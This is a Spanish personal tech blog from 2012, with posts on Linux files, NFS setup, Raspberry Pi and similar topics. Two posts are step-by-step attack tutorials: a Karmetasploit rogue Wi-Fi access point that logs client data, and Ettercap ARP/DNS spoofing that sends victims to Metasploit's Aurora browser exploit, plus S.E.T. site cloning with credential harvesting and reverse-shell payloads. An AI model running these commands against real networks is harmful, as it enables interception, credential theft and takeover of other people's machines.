martes, 28 de febrero de 2012

Un par de ficheros útiles...

  Hoy haré referencia a un par de ficheros que podemos encontrar en los sistemas GNU/Linux y nos aportarán información bastante útil.

  El primero de estos ficheros es /etc/services y contiene información sobre los servicios existentes, el puerto por el que corren y una pequeña descripción de estos. Un fragmento de este fichero sería:
ftp              21/tcp    # File Transfer [Control]
ftp              21/udp    # File Transfer [Control]
#                          Jon Postel <postel&isi.edu>
ftp              21/sctp   # FTP
#                          IETF TSVWG
#                          Randall Stewart <rrs&lakerest.net>
#                          [RFC4960]
ssh             22/tcp    # The Secure Shell (SSH) Protocol
ssh             22/udp    # The Secure Shell (SSH) Protocol
#                          [RFC4251]
ssh             22/sctp   # SSH
#                          IETF TSVWG
#                          Randall Stewart <rrs&lakerest.net>
#                          [RFC4960]
telnet        23/tcp    # Telnet
telnet        23/udp    # Telnet
#                          Jon Postel <postel&isi.edu>
#                24/tcp    any private mail system
#                24/udp    any private mail system
#                          Rick Adams <rick&UUNET.UU.NET>
smtp         25/tcp    # Simple Mail Transfer
smtp         25/udp    # Simple Mail Transfer

  El otro fichero a mencionar es el /etc/protocols y contiene información sobre los protocolos, como es su nombre, numero, una pequeña descripción y el RFC en el que están descritos. Un fragmento de dicho fichero es el siguiente:
hopopt         0 HOPOPT       # IPv6 Hop-by-Hop Option             [RFC2460]
icmp             1 ICMP           # Internet Control Message           [RFC792]
igmp             2 IGMP          # Internet Group Management     [RFC1112]
ggp               3 GGP            # Gateway-to-Gateway                   [RFC823]
ipv4              4 IPv4           # IPv4 encapsulation                       [RFC2003]
st                  5 ST               # Stream                                           [RFC1190]
tcp               6 TCP             # Transmission Control                   [RFC793]
cbt               7 CBT            # CBT                                                 [Tony_Ballardie]
egp              8 EGP            # Exterior Gateway Protocol           [RFC888][David_Mills]

   Con esto concluyo este pequeño tip que nos puede ser útil en determinados momentos.

Un saludo,

Aetsu

viernes, 24 de febrero de 2012

Conociendo NFS (Network File System)

  

  Hoy hablaré sobre NFS (Network File System) o sistema de ficheros en red (en su versión 3) que nos permite compartir todo o parte del sistema de ficheros en red a otros equipos UNIX.
  Comentaré como instalarlo en ubuntu 10.04 que es la version LTS, aunque no deberia ser muy distinto en las nuevas versiones.

  En este post trataré las dos partes de las que se compone NFS, el cliente y el servidor.

[+]  Empezando con el servidor, vamos a instalarlo en ubuntu:
sudo apt-get install nfs-kernel-server nfs-common  portmap
Una vez instalado ubuntu iniciara los servicios por si mismo.

  Donde escogeremos que directorios queremos compartir y a quien es el fichero /etc/exports.
sudo vim /etc/exports
 <sistema de ficheros a compartir>  <ordenador/es destino><(opciones de exportación)>
 Ejemplo:
 /home/aetsu/compartir   192.168.0.111(rw)
En este ejemplo exportamos el directorio  /home/aetsu/compartir  a la dirección 192.168.0.111 en modo lectura y escritura.

  Cuando escogemos con que dirección/es se comparte el sistema de ficheros, tenemos varias alternativas, como son especificar el nombre del pc, el dominio o un ip junto con su máscara:
 Ejemplo:
 /home/aetsu/casa          pc-casa(rw) 
 /home/aetsu/dominio   *.dominio.com(rw) 
 /home/aetsu/rango       192.168.0.0/255.255.255.0(rw) 

  En cuanto a las opciones, conozcamos algunas típicas:
ro -> solo lectura.
rw -> lectura y escritura.
root_squash -> cambia el UID y GID al usuario root.
no_root_squash -> el root remoto es considerado como el local (conserva el UID y GID del usuario root).
all_squash -> cambia todos los usuarios al usuario anónimo.
anonuid/anongid: uid y gid para el usuario anónimo.

  Hay que tener en cuenta que en NFS el acceso a los sistemas exportados se realiza mediante UID y GID de los usuarios, con lo que a los ficheros se aplicarán las restricciones que se le aplicarían originalmente al poseedor de esos UID/GID.
   Teniendo esto en cuenta, es necesario saber que el usuario root tiene siempre UID/GID con valores 0/0, con lo que podría montar ficheros con permisos de root exportados ya que coincidirían los valores antes comentados. Para evitar esto existe la opción root_squash.

Cuando ya tengamos configurado nuestros directorios a exportar, no es necesario reiniciar el servicio para que sean exportados, basta con:
exportfs -r

  [+] Ahora trataremos con el cliente:
  Primero veremos los directorios que exporta el servidor, para ello:
showmount -e host
Una vez conozcamos los directorios exportados, podemos proceder a montarlos manualmente, para ello utilizaremos el comando mount:
 mount -t nfs host:<ruta exportada> <ruta de montaje>
 Ejemplo:
mount -t nfs 192.168.0.111:/home/aetsu/compartir /home/morsa/compartir

Si queremos que los directorios exportados se monten automáticamente, hay que añadirlos al fichero /etc/fstab.

Ejemplo(aparecería al final del fstab):
192.168.0.111:/home/aetsu/compartir   /home/morsa/compartir  nfs  soft,timeo=100       0 0

Antes de concluir, como fuente y a modo de ampliar la información podéis mirar en estos apuntes que son en los que me apoyé para el post.

Un saludo,

Aetsu

domingo, 19 de febrero de 2012

Raspberry Pi, GNU/Linux a un precio inmejorable



  Raspberry Pi es un ordenador con un procesador ARM11 de pequeñas dimensiones (85.60mm x 53.98mm x 17mm), aunque lo que lo hace realmente impresionante es su precio, solo 25 $ el modelo básico.
  Este dispositivo posee un procesador ARM11 a 700Mhz, con salida RCA de video, Jack de audio, salida HDMI, salida USB y en uno de los modelos un adaptador Ethernet. A la salida del producto encontramos dos modelos, el A y el B, cuyas diferencias radican en:
   -> A: Tiene 128 Mb de memoria RAM, un puerto USB y no tiene adaptador Ethernet.
   -> B: Posee 256 Mb de memoria RAM, dos adaptadores USB y un adaptador Ethernet.


 El precio para el modelo A serán 25$, mientras que el precio del modelo B serán 35$, tened en cuenta que estos precios no se incluyen las tasas por importación y similares costes.


  La alimentación se realiza mediante un micro USB de 5v, aunque según pone en sus faqs también es posible hacerlo funcionar con 4 pilas AA.


 En cuanto a sistema operativo, funciona bajo GNU/Linux y nos encontramos con 3 distribuciones soportadas de inicio, que son Debian, Fedora y ArchLinux. Dicho sistema operativo se cargará en una ranura SD y sin ésta no podrá funcionar el ordenador.


 Sobre sus utilidades tenemos desde la posibilidad de reproducir vídeo de gran calidad, hasta utilizarlo de servidor con diversos fines, o jugar a juegos de gráficos modestos.


 De momento aun no está a la venta, aunque teóricamente los pedidos se podrán realizar a partir de mañana lunes 20 a finales de febrero, y podremos escoger entre sus dos modelos disponibles. 




La dirección del proyecto es http://www.raspberrypi.org , visitadlo, conocedlo y ya me contais, yo por mi parte el lunes intentaré conseguir uno ;).


Un saludo,


Aetsu

jueves, 16 de febrero de 2012

pyAscii, convierte imágenes pgm a ascii

pyAscii


  Hace tiempo me toco hacer un pequeño programa para la universidad que convertía imágenes .pgm a ascii y quedaban curiosas composiciones. Llevaba tiempo queriendo liberarlo y hoy me he acordado con lo que aquí tenéis el enlace:

Aetsu

martes, 14 de febrero de 2012

Integrar el tema de firefox con kde


  Si estás cansado de que tu Firefox se vea como una game boy viejuna en Kde, con este tema de kde-look verás como mejora su apariencia considerablemente.
----> Su instalación es simple y rápida, basta con darle a download y se instalará como una extensión del navegador zorruno.
Nos leemos en breve ;)
Aetsu

domingo, 12 de febrero de 2012

Mis aplicaciones de seguridad para android

  Viendo que en gran cantidad de blogs están haciendo (o han hecho) recopilaciones sobre aplicaciones para Android relacionadas con temas de seguridad informática o similares, voy a aportar mi pequeño grano de arena comentando las que lleva mi dispositivo ;).


Estas son las herramientas que suelo llevar en mi android, son todas gratuitas y varias de ellas requieren ser root en el dispositivo. 

Un saludo,

Aetsu

domingo, 5 de febrero de 2012

Ataques sociales – Todo en uno

    Ataques sociales – Todo en uno
    Karmetasploit

>>>>> Información Karmetasploit:

>>>>> Información Postgresql:

  1. Antes de empezar con karma instalaremos en postgresql y dhcp3-server pues los necesitaremos a continuación, ya que karma puede guardar los datos de los clientes que se asocien al punto de acceso creado en una base de datos.
apt-get install postgresql libpq-dev dhcp3-server
  1. Ahora descargaremos el script de karma con wget:
cd /pentest/exploits/framework
  1. Ahora configuramos postgresql:
postgres -c psql
ALTER USER postgres WITH PASSWORD 'password';
Donde password es la contraseña escogida
\q
passwd -d postgres
sudo su postgres -c passwd
E instalamos pg con gem:
gem install pg

  1. Lo siguiente es configurar el servidor dhcp:
    nano /etc/dhcp3/dhcpd.conf:
option domain-name-servers 192.168.1.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 192.168.1.1;
}
  1. Ahora cambiamos el parámetro de conexión de karma con la base de datos, para ello editamos el script karma.rc:
nano karma.rc
Cambiamos solo la primera línea:
sintaxis → db_connect <usuario BD>:<password usuario BD>@127.0.0.1/<nombre de la base donde se introducirán los datos>
db_connect postgres:password@127.0.0.1/karma
Donde:
  • postgres → usuario de la base de datos, postgres es el usuario por defecto.
  • password → contraseña que hemos establecido antes.
  • karma → nombre de la base de datos donde se guardará la información que obtengamos. No es necesario que exista, metasploit la creará por nosotros sino existe.

  1. Ahora ponemos nuestra interfaz en modo monitor con airmon-ng:sintaxis → airmon-ng start <interfaz>
airmon-ng start wlan1
  1. Y a continuación airbase-ng:
    sintaxis → airbase-ng -P -C 30 -c <canal de AP objetivo> -e <ESSID del punto de acceso objetivo> <interfaz en modo monitor>
airbase-ng -P -C 30 -c 6 -e APfalso mon0
  1. Siguiente paso habilitar at0, configurar iptables, habilitar el ip forwarding y lanzar el cliente dhcp sobre el archivo configurado antes:
    sintaxis → ifconfig <interfaz airbase-ng> up 10.0.0.1 netmask 255.255.255.0
    sintaxis → iptables -t nat -A POSTROUTING -o <interfaz acceso Internet> -j MASQUERADE
    sintaxis → iptables -A INPUT -s 10.0.0.0/24 -i <interfaz airbase-ng> -j ACCEPT
    sintaxis → echo "1" >/proc/sys/net/ipv4/ip_forward
    sintaxis → dhcpd3 -cf <lugar donde esta la configuración del servidor dhcp> <interfaz airbase-ng>
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
iptables -A INPUT -s 10.0.0.0/24 -i at0 -j ACCEPT
echo "1" >/proc/sys/net/ipv4/ip_forward
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
  1. Ahora lanzamos metasploit junto con karma:
msfconsole -r karma.rc

Veremos como se crea la base de datos karma:


Por último nos quedará esperar a que los clientes se conecten a nuestro punto de acceso y los datos útiles se irán almacenando en la base de datos karma para su posterior análisis:

Agradecimientos


Agradecimientos

          – Backtrack 5 R1: http://www.backtrack-linux.org/downloads

viernes, 3 de febrero de 2012

Ataques sociales – Ataques en LAN

    Ataques sociales – Ataques en LAN

Una vez tenemos clientes asociados a nuestro punto de acceso, estos se encuentran en nuestra red, con lo que son vulnerables a multitud de ataques, yo mostraré un ejemplo de un DNS-spoofing con Ettercap + Metasploit y otro con S.E.T. .

DNS-spoofing con Ettercap y Metasploit

>>>>> Información DNS (Wikipedia):

>>>>> Información DNS-spoofing (Wikipedia):
  1. El primer paso sera configurar el fichero para las redirecciones del DNS en /usr/local/share/ettercap/etter.dns:
nano /usr/local/share/ettercap/etter.dns

Donde:
  • www.microsoft.com –> es la dirección que cuando la víctima visite será redirigida.
  • A –> significa que es una dirección IPv4.
  • 192.168.0.198 –> es la dirección a la que será redirigida la víctima cuando se conecte a www.microsoft.com
  1. El siguiente paso es lanzar Metasploit:
    msfconsole
  1. Ahora configuramos los parámetros para lanzar el exploit aurora que afecta a los navegadores:
    use exploit/windows/browser/ms10_002_aurora
    set SRVHOST 192.168.0.198
    set SRVPORT 80
    set URIPATH /

Si queremos información sobre el exploit y los parámetros que requiere tenemos el comando show options.
  1. El siguiente paso es lanzar Ettercap junto con el plugin para DNS-spoofing:sintaxis → ettercap -T -q -M ARP -P dns_spoof -i <interfaz conectada a la red> /<ip objetivo>/ //
ettercap -T -q -M ARP -P dns_spoof -i eth1 /192.168.0.200/ //
  1. Por último lanzaremos el exploit desde la ventana de metasploit y esperaremos que la víctima visite la dirección “envenenada” para que sea redirigida y visite la web del exploit.



    S.E.T.
>>>>> Información S.E.T.:

NOTA: El siguiente ejemplo de ataque en LAN lo vi en un vídeo de un curso de Backtrack 5 en español ( muy recomendable) y me pareció muy “potente” por lo que he querido hacerle referencia en este texto.
  1. Abrimos S.E.T.:
cd /pentest/exploits/set
./set
  1. A continuación actualizamos Metasploit y S.E.T.:
  1. Lo siguiente será ir interactuando por los menús, para mas información sobre los diferentes ataques mirad los vídeos ;)
1 – Social-Engineering Attacks

2 – Website Attack Vectors

7 – Multi-Attack Web Method

2 – Site Cloner
url del sitio que queremos clonar

1 – Java Applet Attack Method
2 – Metasploit Browser Exploit Method
3 – Credential Harvester Attack Method
6 – Web Jacking Attack Method
8 – I'm finished and want to proceed with the attack

11
PORT of the listener [443]: //dejamos este campo vació y pulsamos enter
Create a Linux/OSX reverse_tcp meterpreter Java Applet payload also? [yes|no]: yes
25

Ahora empezarán a cargarse los exploits:



Y ya tenemos listo S.E.T. esperando a que un cliente se conecte a la dirección mostrada (en este caso 192.168.1.41), con lo que solo nos quedará realizar un DNS-spoofing para que un objetivo se conecte a nuestra máquina.
Cuando se conecte alguien veremos como reacciona S.E.T.: